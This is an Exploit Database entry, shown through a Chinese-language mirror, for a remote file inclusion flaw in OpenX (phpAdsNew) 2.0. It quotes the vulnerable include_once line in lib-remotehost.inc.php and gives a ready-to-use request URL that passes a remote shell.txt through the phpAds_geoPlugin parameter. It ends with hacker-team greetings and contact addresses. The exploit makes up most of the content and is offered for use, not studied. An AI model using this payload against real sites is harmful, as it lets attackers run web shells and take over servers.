OpenX – ‘phpAdsNew’ Remote File Inclusion

• Exploit Database
• 12 阅读

• 作者： ViRuS Qalaa
  日期： 2010-07-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14432/

• # Exploit Title:OpenX (phpAdsNew) Remote File inclusion Vulnerability
  # Date: 2010/07/20
  # Author: ViRuS Qalaa
  # Email: em9@live.com
  # My Sites : www.pal-mafia.com & www.vbspiders.com
  # Script url:
  http://www.opensourcescripts.com/dir/PHP/Ad_Management/phpadsnew_11.html
  # download Script:
  http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
  # Version:2.0
  # Tested on: Windows
  # Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
  # HaCkEr aRaR: y.0@hotmail.de
  :::::::::::::::::::::::::
  =================Exploit=================
  
  -=[ vuln c0de ]=-
  include_once ($phpAds_geoPlugin);
  /libraries/lib-remotehost.inc.php
  Line:109
  
  ----exploit----
  
  http://
  {localhost}/{path}/libraries/lib-remotehost.inc.php?phpAds_geoPlugin==shell.txt?
  
  ---------greatz----------
  Greatz to :
  hacker arar,ViRuS KSA,Q2,Spy-iq
  
  and My friends Others and My friends in MSN
  EnJoY o_O